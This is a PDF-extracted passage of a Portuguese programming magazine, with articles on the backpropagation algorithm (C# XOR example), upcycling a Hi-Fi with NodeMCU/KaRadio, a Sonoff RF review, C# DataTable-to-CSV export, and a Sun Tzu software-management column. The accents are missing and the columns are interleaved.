Nesta edio trazemos at vs caros leitores
uma abordagem ao algoritmo de backpropagation.
Este algoritmo foi desenvolvido nos anos 80 por Ru-
melhant, Hinton e Williams e um dos algoritmos
mais conhecidos das redes neuronais.
De forma a melhor introduzirmos o tema, uma
rede neuronal artificial inspirada no funcionamento
nosso prprio sistema funcional enquanto humanos.
Ou seja, uma rede que aprende a cada experincia
vivenciada. Um dos constituintes principais do siste-
ma nervoso humano o neurnio. Esta clula res-
ponsvel pela conduo dos impulsos nervosos, e
comunicam entre si atravs de sinapses. Por sua vez
a sinapse a regio onde dois neurnios entram em
contacto entre si, sendo que os impulsos recebidos,
por exemplo, pelo neurnio X, so processados pas-
sando a informao resultante ao neurnio Y por
meio de uma substncia neurotransmissora. Sem
querer alongar muito este tema biolgico, podemos
apenas dizer que os neurnios so formados por
dendritos (funcionam como terminais de entrada),
pelo corpo central (onde ocorre o processamento) e
pelos axnios (que por sua vez funcionam como ter-
minais de sada).
As redes neuronais artificiais so redes com-
putacionais que apresentam um modelo matemtico
inspirado na estrutura neuronal anteriormente apre-
sentada e que adquirem conhecimento atravs de
cada experincia processada, simulando assim a in-
teligncia humana. Este comportamento possvel
graas s interaces entre as diversas unidades de
processamento que constituem estas redes. Uma
vantagem deste tipo de implementao algortmica
que possui um elevado grau de paralelismo, caracte-
rstica que lhe proporciona uma elevada rapidez de
processamento.
Ento temos que numa rede neuronal existe
trs tipos de camadas:
Camada de Entrada: onde os padres so apresen-
tados rede;
Camadas Intermdias (Escondidas): onde feita a
maior parte do processamento, atravs das conexes
ponderadas que podem ser consideradas como extrato-
ras de caractersticas;
Camada de Sada: onde o resultado final con-
cludo e apresentado.
16
O desenvolvimento do algoritmo backpropagation
defende que possvel treinar as camadas intermdias,
resultando no modelo MLP (Multilayer Perceptron), isto ,
so redes de mltiplas camadas, formadas por uma camada
de entrada, uma ou mais camadas ocultas (intermdias) e
uma camada de sada, como pode ser visto na imagem ante-
rior. Cada neurnio de uma camada recebe os sinais de to-
dos os neurnios da camada anterior e propaga os seus
dados de sada a todos os neurnios da camada posterior.
Para um melhor enquadramento terico do leitor,
importante referir que o algoritmo de backpropagation
apenas um dos muitos que podem ser usados num modelo
MLP. Existem dois tipos de algoritmos de treino, os supervi-
sionados e os no supervisionados.
Os algoritmos supervisionados necessitam de um
vector de entrada e de um vector de sada (tambm conhe-
cido como vector alvo), ambos so utilizados para o treino da
rede neuronal.
Quando o vector de entrada aplicado, a sada
calculada e comparada com o vector alvo correspondente. O
erro encontrado ento reassumido pela rede neuronal e os
pesos so actualizados de forma a minimizar o erro. Este
processo repetido at que o erro dos vectores seja corre-
spondente ao valor pr-definido para cada conjunto.
Por sua vez, os algoritmos no supervisionados, no
tm um vector alvo para os dados de sada, no tendo assim
qualquer comparao para determinar a soluo ideia. Neste
caso, o algoritmo modifica dos pesos da rede de forma a que
os valores de sada sejam consistentes
O mtodo backpropagation um algoritmo supervi-
sionado. Correndo o risco de me repetir, mas ajudando a
cimentar tudo o que j foi escrito atrs, durante o treino, a
rede comporta-se da seguinte forma:
Um padro apresentado camada de entrada da
rede. Este processamento flui atravs da rede, cama-
da por camada, at que a resposta seja produzida
pela camada de sada.
Assim que a sada obtida, a mesma comparada
sada desejada para esse padro particular. Se esta
no estiver correta, o erro calculado e o mesmo
propagado a partir da camada de sada at a camada
de entrada, e os pesos das conexes das unidades
das camadas internas vo sendo modificados con-
forme o erro retropropagado (da o nome do algorit-
mo)
Ou seja, este algoritmo tem duas fases distintas
(tambm conhecidas como a fase Forward - em que
definida a saida da rede para um dado padro de entrada e
a fase Backward em que a diferena entre o resultado
desejado e o resultado obtido utilizada para atualizar os
pesos das conexes).
 A PROGRAMAR

ALGORITMO BACKPROPAGATION

Um ponto importante nas redes que utilizam este algo- utilizada, maior ser a mudana dos pesos, aumen-
ritmo que as mesmas utilizam uma variao Delta prpria. tando assim velocidade de aprendizagem da rede, o
Esta regra do Delta generalizado implementa um gradiente que pode levar oscilao do modelo na sua super-
descencente no quadrado da soma do erro em funes line- fcie de erro.
ares, o que provoca a que as redes possam ficar sujeitas aos
Uma maneira de aumentar a taxa de aprendizagem
problemas dos minimos locais.
sem levar oscilao da rede modificando a regra Delta
Generalizada de forma a incluir o termo momentum, uma
constante que determina o efeito das mudanas que a rede
sofreu anteriormente dos pesos na direo atual do mo-
vimento no espao dos pesos.

Sem querer levar demasiado este artigo para o lado

matemtico do algoritmo, importante deixar ao leitor algumas
consideraes sobre a Regra Delta Generalizada

Esta regra funciona quando so utilizadas na rede, uni-

dades com uma funo de ativao semi-linear, isto ,
uma funo diferencivel e no decrescente, como por
exemplo, a funo Sigmoid.

Utiliza o metdo de descida do gradiente por correo

de erro. A este processo de reduo gradativa do erro
que acompanha a minimizao d-se o nome de con-
vergncia.

A taxa de aprendizagem uma constante de propor-

cionalidade no intervalo [0,1], pois este procedimento
requer apenas que a mudana no peso seja proporcion-
al meta que queremos atingir.

O gradiente descendente requer que sejam tomados

passos infinitesimais pois quanto maior for a constante

17
A PROGRAMAR
ALGORITMO BACKPROPAGATION

Em suma, acerca deste algoritmo devemos reter: A implementao que proponho ao leitor, com o
recurso linguagem C#. Como este j um algoritmo com
Utiliza um mtodo de descida do gradiente por cor- alguns anos, so muitas as variaes e diferentes imple-
reco de erro mentaes noutras linguagens que podem encontrar facil-
mente na internet.
A funo de custo minimizada realizando iterati-
vamente ajustes nos pesos sinpticos de acordo com o
erro quadrtico acumulado nos padres do conjunto de using System;
treino
namespace BackPropagationXor
O ajuste dos pesos realizado atravs do clculo da {
class Program
mudana da funo de custo com respeito mudana {
em cada peso, isto , com o mtodo delta. static void Main(string[] args)
{
Ao processo de reduo do gradiente do erro que train();
acompanha a minimizao, d-se o nome de con- }
vergncia. class sigmoid
{
medida que a rede aprende o valor do erro converge public static double output(double x)
para um valor estvel, normalmente irredutvel. {
return 1.0 / (1.0 + Math.Exp(-
x));
O processo de aprendizagem prossegue at que algum }
critrio pr-definido seja atingido, como por exemplo o
valor mnimo de erro global ser atingido. public static double derivative
(double x)
Tudo isto origina, o fluxograma j conhecido deste algo- {
ritmo: return x * (1 - x);
}
}

class Neuron
{
public double[] inputs = new double
[2];
public double[] weights = new double
[2];
public double error;

private double biasWeight;

private Random r = new Random();

public double output

{
get { return sigmoid.output
(weights[0] * inputs[0] +
weights[1] * inputs[1] + biasWeight); }
}

public void randomizeWeights()

{
weights[0] = r.NextDouble();
weights[1] = r.NextDouble();
biasWeight = r.NextDouble();
Ento e poder perguntar o leitor Quais principais }
desvantagens deste algoritmo?
public void adjustWeights()
A principal desvantagem deste algoritmo a lentido do {
mesmo caso seja um conjunto de treino complexo, uma vez weights[0] += error * inputs[0];
weights[1] += error * inputs[1];
que obriga a bastantes clculos a cada neurnio artificial. H biasWeight += error;
tambm a possibilidade do algoritmo convergir para um m- }
nimos locais, que apesar de apresentarem uma soluo }
estvel, no correspondem sada correcta do algoritmo. Para private static void train()
acelerar o processamento de dados comum, por exemplo, {
adicionar ns intermedirios de forma a aumentar o proces- // the input values
samento paralelo da rede. double[,] inputs =
{
{ 0, 0},
{ 0, 1},

18
 A PROGRAMAR

ALGORITMO BACKPROPAGATION

{ 1, 0},
{ 1, 1} // adjusts the weight of the out-
}; put
neuron, based on its er-
// desired results ror
double[] results = { 0, 1, 1, 0 }; outputNeuron.error =
sigmoid.derivative(outputNeuron.output)
// creating the neurons *
Neuron hiddenNeuron1 = new Neuron(); (results[i] - outputNeu-
Neuron hiddenNeuron2 = new Neuron(); ron.output);
Neuron outputNeuron = new Neuron(); outputNeuron.adjustWeights();

// random weights // then adjusts the hidden neu-

hiddenNeuron1.randomizeWeights(); rons'
hiddenNeuron2.randomizeWeights(); weights, based on their er-
outputNeuron.randomizeWeights(); rors
hiddenNeuron1.error =
int epoch = 0; sigmoid.derivative(hiddenNeuron1.output)
*
Retry: outputNeuron.error * outputNeuron.weights
epoch++; [0];
for (int i = 0; i < 4; i++) // very hiddenNeuron2.error =
//important, do NOT train for only one example sigmoid.derivative(hiddenNeuron2.output)
{ *
// 1) forward propagation outputNeuron.error * outputNeuron.weights
//(calculates output) [1];
hiddenNeuron1.inputs = new double[]
{ inputs[i, 0], inputs[i, 1] }; hiddenNeuron1.adjustWeights();
hiddenNeuron2.inputs = new double[] hiddenNeuron2.adjustWeights();
{ inputs[i, 0], inputs[i, 1] }; }

outputNeuron.inputs = new double[] if (epoch < 2000)

{ hiddenNeuron1.output, hiddenNeuron2.output }; goto Retry;

Console.WriteLine("{0} xor {1} = Console.ReadLine();

{2}", inputs[i, 0], inputs[i, 1], }
outputNeuron.output); }
}
// 2) back propagation (adjusts
weights)

Mais uma vez, quero recordar que esta s uma forma de

implementao do algoritmo, muitas outras poderiam ser usa-
das, como por exemplo esta em linguagem C: http://
courses.cs.washington.edu/courses/cse599/01wi/admin/
Assignments/bpn.html
Desejo a todos os leitores, boas implementaes, at prxi-
ma edio!

AUTOR
Escrito por Rita Peres

Natural de Castelo Branco, licenciou-se em Engenharia Informtica pela Universidade da Beira Interior.
Membro do P@P desde Janeiro de 2010. Embaixadora das Geek Girls Portugal Ncleo de Lisboa.

19
ELECTRNICA
Up-Ciclar a velhinha aparelhagem Hi-Fi
 Electrnica
UP-CICLAR A VELHINHA APARELHAGEM HI-FI

Adicionalmente deve ser ligado o cabo USB apenas

Introduo
para alimentao de corrente, na NodeMCU e a sada de
comum ouvir falar em reciclar objectos, equipamen- udio (jack), na entrada de linha do equipamento. Como o
tos, etc referindo-se ao envio para desmontagem e recicla- equipamento up-ciclado j tem amplificador de entrada, no
gem de materiais. Claro que a reciclagem e os trs Rs, so necessrio utilizar esse tipo de circuito.
algo de bom que podemos fazer pelo ambiente. No entanto
Firmware
este artigo foca-se no up-cicle, que basicamente consiste no
processo de pegar num equipamento j obsoleto, mas ainda O primeiro passo, agora ser descarregar os fichei-
funcional e acrescentar-lhe funcionalidades, de forma a torn- ros.
lo novamente til.
user1.4096.new.4.bin
Ao longo deste artigo iremos construir o circuito para
transmisso de udio e web-rdio para um equipamento Hi-Fi user2.4096.new.4.bin
padro, de forma a mantermos o equipamento actualizado,
na actualidade tecnolgica! No caso concreto em que isto foi boot_v1.6.bin
feito, teve por objectivo aproveitar uma antiga aparelhagem Hi-
blank.bin
Fi, j com uns bons anos, mas que ainda tem um bom amplifi-
cador udio e umas boas colunas e alguns efeitos de equaliza- esp_init_data_default.bin
o merecedores de alguma extenso de vida. Este projecto
foi num instructable, bastante interessante, sobre este mesmo boot_v1.5.bin
tema e inspirado no up-cycle do Bem Heck show.
De seguida o passo ser carregar os ficheiros para a No-
Hardware deMCU, recorrendo ferramenta disponvel no site da Ex-
pressIf.
Neste projecto ser usado um NodeMCU e um Mdulo
VS1053, ambos disponveis na net. A corrente neste caso con- Feito isto procedemos ao upload, ligando a NodeMCU
creto fornecida por uma derivao da alimentao do leitor ao computador via porta USB e carregando os ficheiros, con-
de cassetes udio, neste caso o equipamento up-ciclado, forme apresentado na imagem seguinte.
tinha uma sada de 5vdc que foi aproveitada para este efeito.
Como no existem todas as parts em fritzing neste arti-
go as ligaes so apenas apresentadas em formato tabela,
para facilitar a replicao do circuito.

NodeMCU VS1053

5v 5v

ADC GND

D5 SCK

D6 MISO

D7 MOSI

TXD UART RX

RXD UART TX

D1 XDCS

D2 DREQ

D3 XRST Uma vez carregado o firmware, podemos desligar a

NodeMCU do computador e voltar a ligar todo o circuito no
D8 XCS interior da caixa do equipamento que est a ser up-ciclado.
Convm referir que o circuito no deve ficar perto de fontes

21
Electrnica
UP-CICLAR A VELHINHA APARELHAGEM HI-FI

de calor ou campos magnticos. No caso concreto da realiza- Concluso

o deste projecto o circuito ficou na parte de trs do equipa-
mento num espao amplo e vazio, onde foi montada tambm
uma ventoinha de 12v para garantir maior refrigerao.
Assim que esteja de novo ligado o equipamento, pode-
mos aceder ao software de configurao do mesmo, usando
um computador com wireless, acedendo rede com ssid
WifiWebRadio e abrindo no browser o endereo 192.168.4.1.
No browser ser apresentada a pgina de configurao, onde
podemos configurar a nodemcu para ligar nossa rede wifi.
De igual modo podemos carregar o ficheiro de estaes de
webrdio (ficheiro txt), ou configurar manualmente todas as
nossas estaes e caso tenhamos um streaming server, o nos-
so streaming server.
Terminado todo este processo podemos finalmente usar
o equipamento, equipado com o cliente de webRadio KaRadio,
utilizando o browser web de qualquer dispositivo que tenhamos
ligado rede, conforme se pode ver na figura seguinte.
Ao longo do artigo foi apresentada uma forma simples
de fazer up-cycling de um equipamento udio, que se en-
contre obsoleto. Como se pode observar o circuito bas-
tante simples e existem diversos exemplos de circuitos base-
ados em KaRadio na internet. Alguns mais interessantes
incluem um lcd tipo Nokia 5150, outros com display Oled,
alguns at controlo remoto. Todos estes extras usam o
modelo base KaRadio que foi utilizado para este projecto e
apresentado ao longo do artigo.
Apesar do Reciclar, ser o mais comum uso do que
est obsoleto, existem sempre bons usos para equipamen-
tos que j excederam o seu tempo de vida til, ou que fica-
ram ultrapassados pela evoluo tecnolgica. No entanto tal
como eu, os leitores, podero querer dar uma nova vida a
um equipamento e esta foi a ideia com este artigo!
Referncias

https://github.com/karawin/Ka-Radio

http://www.royalsystems.dk/blog/preview.php?pid=5

http://www.serasidis.gr/circuits/w7500_vs1053/
w7500_vs1053.php

AUTOR
Escrito por Antnio C. Santos

Programar criar um novo mundo escrevendo cdigo, cumprindo os mais elementares desgnios da
vida, aprender, ensinar, criar, partilhar, melhorar e seguir. Formou-se no Instituto Politcnico de Viana
do Castelo. Membro da Comunidade Portugal-a-Programar desde Agosto de 2007, tambm membro da
Sahana Software Foundation, onde Programador Voluntrio desde 2012, actualmente exerce funes
de mentor voluntrio na plataforma MOOC Coursera . Twitter:@apocsantos

22
Anlises de Hardware
Sonoff RF
Anlises de Eletrnica
SONOFF RF
Equipamento: Sonoff RF
Fabricante: Itead
SKU: IM15116003
Dimenses: (C)88*(L)38*(A)
23mm
Nesta edio pela primeira vez ser feita uma review de
um equipamento/componente mais destinado ao pessoal
maker e aos entusiastas do IoT. Neste caso um Sonoff RF,
basicamente um rel controlado remotamente, bastante engra-
ado para domtica e outros projetos de IoT.
Especificaes gerais
Voltagem de trabalho: 90-250v AC(50/60Hz)
Corrente limite: 10A
Potncia limite: 2200 watts
Dimenses: (C)88*(L)38*(A)23mm
Cor: White
Temperatura de trabalho: 0C-40C
Humidade relativa de trabalho 5%-90%RH, sem con-
densao
Frequncia Wifi: 2.4Ghz
Trata-se de um circuito simples, bem embalado numa
caixa plstica resistente, fcil de montar e de aplicar, mesmo
para os mais aprendizes. Dispe de um circuito RF adicional a
funcionar nos 433mhz, o que permite ser usado com um co-
mando, ou com um pouco de pacincia com um modulo RF,
como os usados no arduino. O controlo por wireless fica ao
cargo de um ESP8266 da Expressif, bastante conhecido de
quase toda a gente. Note-se que o ESP e o MCU destinado a
WIFI, so apenas ligados por alguns dos GPIO do ESP8266.
24
Como se pode ver na imagem anterior, a ESP8266
est montada na placa principal e vem-se perfeitamente os
headers do MCU que trata do sinal RF.
Algo que achei interessante sobre este equipamento
o facto de serem disponibilizados no site do fabricante os
esquemas eletrnicos, o layout da placa principal, bem como
o datahseet do ESP8266EX, utilizado no circuito.
De destacar que o dispositivo compatvel nativa-
mente com Google Nest e Amazon Alexa, algo que pode ser
ainda mais interessante, uma vez que criar um dispositivo
que utilize Alexa, com um raspberry pi bastante simples,
evitando assim ter de comprar um Echo Dot ou outro disposi-
tivo semelhante.
Algo que notei, ao analisar o dispositivo foi a falta de uma
app Windows Universal Platform, mas dada a simplicidade
da comunicao no ser complicado desenvolver uma app
para Windows que controle os dispositivos.
A configurao poderia ser mais facilitada com uma
interface web, que permitisse efectuar logo as alteraes do
ssid e respectiva password, no entanto a aplicao iOS
bastante simples de se usar.
Para os mais entusiastas da electrnica, ser fcil
usar um circuito USB - TTL de 3.3v para poder reprogramar
na ntegra o sonoff e assim libertar todo o seu potencial,
alm de j existirem firmwares alternativos para este circuito,
mais concretamente o sonoff boilerplate e o sonoff Tasmota,
cada um com as suas vantagens e desvantagens. O sonoff
Tasmota, j suporta MQTT e actualizao de firmware OTA,
enquanto que o Sonoff Boilerplate destinado a alteraes
mais simples, apesar de tambm trazer suporte para MQTT
e OTA.
Concluso
De uma forma geral o dispositivo apesar de simples
bastante interessante, na medida em que coloca ao utiliza-
dor mais comum uma soluo quase chave na mo com
um interruptor wireless, programvel e controlvel pela apli-
cao. Para quem usa Amazon Alexa, tem sempre a vanta-
gem de ser simples de adicionar aos dispositivos controlados
pela Alexa, o que se revela til. A qualidade de construo
razovel, em especial para usos em interior, no devendo
ser utilizado no exterior. Por outro lado a dimenso do dispo-
sitivo, facilita a colocao e fixao em estruturas existentes.
De um modo geral, sem considerar mais nenhum
extra ao circuito, ele revela-se uma soluo engraada para
automao caseira e controlo de dispositivos que apenas
necessitem de um interruptor.

COLUNAS
C# - De DataTable para ficheiro CSV (mais comum do que seria agradvel)
Kernel Panic - A Arte da Guerra e a tecnologia
 C#
De DataTable para ficheiro CSV

(mais comum do que seria agradvel)

Tal como o ttulo sugere, mais comum do que seria }
agradvel, ter de fazer transformaes de dados de DataTa-
ble, para ficheiros CSV separados por vrgulas ou ponto-e- private static string QuoteValue(string
value)
vrgula, para se transferirem dados nas mais diversas situa- {
es! Seria muito mais agradvel usar um formato tipo XML ou return String.Concat("\"",
mesmo JSON do que usar csv! No entanto o CSV est para value.Replace("\"", "\"\""), "\"");
}
ficar, tendo em 2005 sido alvo de RFC para formato comum e }
Mime Type para transferncia de ficheiros (RFC4188).
Ao longo do artigo ser apresentada uma classe, bas-
A classe bastante simples e apenas implementa as
tante simples para escrever dados oriundos de uma DataTable
funcionalidades mais elementares para a escrita do ficheiro
para ficheiro em formato CSV de acordo com o RFC4180 e
CSV. Agora vejamos a sua utilizao:
posteriormente em formato CSV separado por ponto-e-vrgula,
conforme comummente usado para transferncia de dados
// C# Code
entre sistemas legados. public static class Program {
public static void Main() {
Os dados armazenados num objecto do tipo DataTable, DataTable sourceTable = new DataTable();
encontram-se num formato suportado pela framework .net
para armazenamento em memria. Como se trata de um objec- sourceTable.Columns.AddRange(new
DataColumn[] {
to existem diversos mtodos bastante teis que podem ser new DataColumn("ID", typeof(Guid)),
chamados. Muitos deles bastante teis quando se pretende new DataColumn("Date", typeof
trabalhar com os dados em memria. No entanto a classe Da- (DateTime)),
taTable no tem suporte para escrita de ficheiros csv. new DataColumn("StringValue",
typeof(string)),
Existem diversas formas de escrever o contedo de new DataColumn("NumberValue",
typeof(int)),
uma DataTable em csv, algumas mais trabalhosas, outras mais new DataColumn("BooleanValue",
simplificadas, desde utilizao de loops para se escrever linha typeof(bool))
a linha do ficheiro, opes mais morosas. });

A seguinte classe, implementa uma forma simples de escrever sourceTable.Rows.Add(Guid.NewGuid(),

DateTime.Now, "String1", 100, true);
dados vindos de qualquer DataTable para o formato CSV se- sourceTable.Rows.Add(Guid.NewGuid(),
parado por vrgulas. DateTime.Now, "String2", 200, false);
sourceTable.Rows.Add(Guid.NewGuid(),
public static class Rfc4180Writer DateTime.Now, "String3", 300, true);
{
public static void WriteDataTable(DataTable using (StreamWriter writer =
sourceTable, TextWriter writer, bool new StreamWriter("C:\\dev\\dados.csv"))
includeHeaders) {
{ Rfc4180Writer.WriteDataTable
if (includeHeaders) { (sourceTable, writer, true);
IEnumerable<String> headerValues = }
sourceTable.Columns }
.OfType<DataColumn>() }
.Select(column => QuoteValue
(column.ColumnName));
Como se pode ver no exemplo de utilizao, foi criada
writer.WriteLine(String.Join(",", uma DataTable e acrescentados dados de diversos tipos a
headerValues)); essa mesma datatable, antes da mesma ser usada para
}
gerar o ficheiro csv recorrendo classe criada anteriormente
IEnumerable<String> items = null; (Rfc4180Writer). No entanto o mais comum a DataTable
conter dados vindos de uma query a um sistema gestor de
foreach (DataRow row in sourceTable.Rows) { base de dados tipo MS-SQL Server, ou outro.
items = row.ItemArray.Select(o =>
QuoteValue(o.ToString())); Por exemplo, uma query para retornar todos os autores da
writer.WriteLine(String.Join(",",
items)); PROGRAMAR e escrever essa informao num ficheiro csv,
} por exemplo, para importar para uma aplicao de email,
para enviar o prximo pedido de artigos!
writer.Flush();

27
 C#
DE DATATABLE PARA FICHEIRO CSV (MAIS COMUM DO QUE SERIA AGRADVEL)

SqlConnection sqlConnection1 = new SqlConnection(); A utilizao desta classe, seria idntica em ASP.net
SqlCommand cmd = new SqlCommand(); MCV com a excepo do resultado que retornado, que
SqlDataReader reader; passa a ser uma instncia de FilePathResult.
cmd.CommandText = "SELECT * FROM autores";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1; public class ReportController : Controller
{
sqlConnection1.Open(); [HttpGet()]
reader = cmd.ExecuteReader(); public ActionResult Export()
sqlConnection1.Close(); {
var sourceTable = new DataTable(); DataTable sourceTable = new DataTable();
sourceTable.Load(reader);
sourceTable.Columns.AddRange(new
using (StreamWriter writer = new StreamWriter DataColumn[] {
("C:\\Temp\\dump.csv")) new DataColumn("ID", typeof(Guid)),
{ new DataColumn("Date",
Rfc4180Writer.WriteDataTable(sourceTable, typeof(DateTime)),
writer, true); new DataColumn("StringValue",
} typeof(string)),
new DataColumn("NumberValue",
typeof(int)),
No caso de querermos escrever um ficheiro CSV mas separa- new DataColumn("BooleanValue",
do por ponto-e-vrgula ser necessrio apenas fazer uma alte- typeof(bool))
rao na classe, tal como apresentado em seguida: });

sourceTable.Rows.Add(Guid.NewGuid(),
public static class Rfc4180Writer DateTime.Now, "String1", 100, true);
{ sourceTable.Rows.Add(Guid.NewGuid(),
public static void WriteDataTable(DataTable DateTime.Now, "String2", 200, false);
sourceTable, TextWriter writer, bool sourceTable.Rows.Add(Guid.NewGuid(),
includeHeaders) DateTime.Now, "String3", 300, true);
{
if (includeHeaders) { byte[] outputBuffer = null;
IEnumerable<String> headerValues =
sourceTable.Columns using (MemoryStream tempStream = new
.OfType<DataColumn>() MemoryStream()) {
.Select(column => QuoteValue using (StreamWriter writer = new
(column.ColumnName)); StreamWriter(tempStream)) {
Rfc4180Writer.WriteDataTable
writer.WriteLine(String.Join(",", (sourceTable, writer, true);
headerValues)); }
}
outputBuffer = tempStream.ToArray();
IEnumerable<String> items = null; }
foreach (DataRow row in sourceTable.Rows) {
items = row.ItemArray.Select(o =>
QuoteValue(o.ToString()));
writer.WriteLine(String.Join(",", Concluso
items));
} Apesar de muitas vezes poder ser achado deselegan-
writer.Flush(); te ou at aborrecido estar a escrever ficheiros em formato
} csv, mais comum do que para alguns seria expectvel. No
entanto apesar da falta de suporte nativo em C# para este
private static string QuoteValue(string efeito, a implementao no difcil e acaba sendo til para
value)
{ quando se tem de trabalhar com estas situaes! Alm dis-
return String.Concat("\"", so, o formato csv, parece estar para ficar, como pode ser
value.Replace("\""; "\"\""), "\""); //alterado visto no RFC, pelo que nada como ter o cdigo preparado
} para lidar com ele!
}

AUTOR
Escrito por Antnio C. Santos

Programar criar um novo mundo escrevendo cdigo, cumprindo os mais elementares desgnios da
vida, aprender, ensinar, criar, partilhar, melhorar e seguir. Formou-se no Instituto Politcnico de Viana
do Castelo. Membro da Comunidade Portugal-a-Programar desde Agosto de 2007, tambm membro da
Sahana Software Foundation, onde Programador Voluntrio desde 2012, actualmente exerce funes
de mentor voluntrio na plataforma MOOC Coursera . Twitter:@apocsantos

28

A Arte da Guerra e a tecnologia
possvel que para muitos o ttulo possa parecer de
uma estranheza absurda, quase atroz talvez, ou mesmo sem
nexo. No entanto o ttulo indica exactamente o que pretendi-
do, ao abordar a aplicao de um livro que data do sculo V
AC, escrito por um estratega militar chins, Sun Tzu.
O que pode ter um texto sobre guerra a ver com softwa-
re? Talvez mais do que se imagina, pois muitos dos princpios
descritos no livro, tm uma aplicao bastante mais vasta que
a vertente blica, havendo inclusive j estudos sobre a aplica-
o desses princpios a vertentes como a gesto e o negcio.
O livro, encontra-se dividido em treze captulos, cada
um dedicado a um aspecto concreto, que apesar da amplitude
do texto, denota sempre a vertente blica do mesmo. No en-
tanto isto no invalida a sua aplicao ao software! Ora ve-
jamos.
Avaliao detalhada e planeamento () co na extenso convencional da expresso, antes pelo con-
Quanto mais detalhada for uma avaliao, maior a
quantidade de informao disponvel no momento de definir os
planos de aco. Como em todas as tarefas o planeamento de
execuo depende em grande parte de uma avaliao slida e
consistente. Por exemplo, quando se vai executar um novo
projecto, uma ideia fora da caixa, ou nos pedida a execuo
de uma tarefa, quanto mais detalhada for a avaliao da mes-
ma, melhor ser o planeamento da execuo. Poderemos ava-
liar em mais detalhes o que ter de ser feito, como o fazer, que
caminhos seguir e que caminhos evitar, a interferncia de fac-
tores como o tempo disponvel, etc que iro inferir no suces-
so da batalha, no caso do desenvolvimento, no seria bem
uma batalha, mas antes um desafio, ou uma tarefa.
O planeamento uma das mais importantes fases de
uma tarefa. Ainda que parea que planeamento conversa de
gestor de projecto, tambm muitas vezes chamado de o tipo
que acha que nove mulheres conseguem gerar um filho em um
ms, na verdade planeamento algo transversal a quem lide-
ra, a quem coordena, a quem executa! Um lder define um pla-
no, no entanto cada executante ter de planear pelo menos o
uso do seu tempo, conjugado com o tempo disponvel, consi-
derando as variveis que esto dentro da sua esfera de contro-
lo, para melhor utilizar o tempo disponibilizado, para realizar a
sua tarefa, num plano maior que definido pelo lder.
Agora, o general que ganha uma batalha faz muitos clculos
em seu templo antes que a batalha seja travada." (Sun Tzu)
Para contextualizar a citao, convm referir que na
poca em que o livro foi escrito, os templos eram edificaes
de grande envergadura, considerados de propsito nobre e
eram muitas vezes utilizados como quartis generais, na vs-
pera de partidas para campanhas militares. Nestes edifcios
eram traados os planos, estudadas as estratgias e finaliza-
Kernel Panic
dos os planos gerais, que seriam utilizados na batalha que
se avizinharia.
De uma forma muito sucinta, poderia dizer-se que o
vencedor planeia antecipadamente, ainda que se possa vir
a alterar os planos de forma flexvel, existem sempre planos
iniciais, o que por si s implica uma avaliao metdica da
tarefa e das circunstncias que a envolvem.
Exactamente como no desenvolvimento de software,
no projecto de um sistema informtico complexo, no planea-
mento de uma rede, etc O sucesso da execuo, depende
sempre de uma avaliao cuidada dos objectivos a cumprir e
de um planeamento cuidado de como os cumprir!
Travando uma guerra ()
Ao contrrio do livro, no se ir travar um conflito bli-
trrio, o objectivo ser sempre evitar qualquer tipo de confli-
to. No entanto nesta parte o livro, foca-se na explicao de
como deve ser entendida a economia da guerra necess-
ria a vitria rpida e decisiva, limitando sempre o custo de
uma competio ou conflito.
Ora isto at pode parecer que nada tem a ver com
tecnologia e desenvolvimento, no entanto os princpios de
base tm bastantes pontos em comum. Ora vejamos:
Quando se envolve no conflito, se a vitria longa em che-
gar, ento as armas dos homens ficaro maadas e seu
ardor ser despejado. (Sun Tzu)
Este princpio pode ser aplicado ao desenvolvimento
de software, como uma regra, descrevendo a relao entre a
durao de um ciclo de desenvolvimento e a moral dos de-
senvolvedores. Por exemplo, se um grupo de programado-
res, trabalhar no mesmo projecto, meses a fio, sem objecti-
vos claro ou fim vista, possvel que eles se sintam frus-
trados e em consequncia a sua produtividade comece a
baixar. O desenvolvimento tecnolgico um esforo intelec-
tual, pelo que a motivao o principal combustvel para a
produtividade. Trabalhar todos os dias, sem percepcionar se
o trabalho est a produzir resultados pode ser desmotivante.
Tal como indicado em algumas metodologias agile, o road-
map de desenvolvimento deve ser dividido em pequenos
milestones, que uma equipe possa atingir em pequenos lap-
sos de tempo. Isto por sua vez, fornecer um sentimento de
progresso e propsito atingido.
Na guerra, deixar o seu grande objectivo ser a vitria, no
longas campanhas. (Sun Tzu)
Esta mesma citao pode ser interpretada em dois
sentidos completamente dspares um do outro. Por um lado
pode ser interpretada como precursora da filosofia por detrs
do sistema operativo Unix, de escrever programas que fa-
29
Kernel Panic
A ARTE DA GUERRA E A TECNOLOGIA
am uma tarefa e a faam de forma exmia, mantendo a simpli-
cidade acima de tudo. Sendo o Unix um sistema operativo feito
para ser simples, pretendendo ser apenas uma coisa, contra-
riamente ao projecto de onde ele nasceu, o Multics, que pre-
tendia ser muitas coisas, rodeado de complexidades, que dita-
ram o seu fracasso. Seguindo esta filosofia, quando se desen-
volve um software, ou no caso de IoT um projecto, deve ser
mantido sempre presente qual o objectivo principal do projecto,
as funcionalidades chave que ele dever dispor, ou o problema
que ele ir resolver e implementar o projecto correctamente.
Outra interpretao possvel, seria considerar a citao
como uma precursora dos princpios da metodologia Lean:
Entregar o mais depressa possvel! Quanto mais depressa for
entregue o projecto, sem defeitos de maior, mais rapidamente
se obter o feedback das partes o que permitir incluir altera-
es na prxima iterao. Se por outro lado se entregar softwa-
re no funcional o feedback ser perdido, pois no haver a
possibilidade de testar correctamente, situao em que a prxi-
ma iterao do software ser mais difcil ou at mesmo impos-
svel, em situaes em que a iterao seguinte dependa do
feedback da iterao anterior.
Ataque Estratgico () dos os obstculos que se lhe apresentem. No caso de um
No livro, ao longo deste captulo so discutidos os
cinco factores crticos do sucesso na guerra, que por
ordem so: ataque, estratgia, alianas, exrcito e cida-
des. No caso do desenvolvimento de software, no apli-
cam desta forma, at porque no se trata de um conflito
blico, mas antes de uma gesto estratgica. No entanto
alguns dos ensinamentos, so utilizveis nesta vertente.
Ora vejamos:
Ora, o General o baluarte do Estado; Se o baluarte est
completo em todos os pontos, o Estado ser forte; Se o baluar-
te for defeituoso, o Estado ser fraco. (Sun Tzu)
No pargrafo supracitado, descrita a importncia do papel do
gestor de projecto ou um bom lder de equipe, para o sucesso
de um projecto. O sucesso depende da fora de todas as pes-
soas envolvidas no projecto e como tal, cabe ao gestor ou lder
de equipa, manter a coeso da equipe! A responsabilidade
comea pelo todo, se o lder no for bom, no importa o talento
da equipe, o projecto estar condenado. Certamente nesta
altura algum estar a pensar Ento, mas os developers, tra-
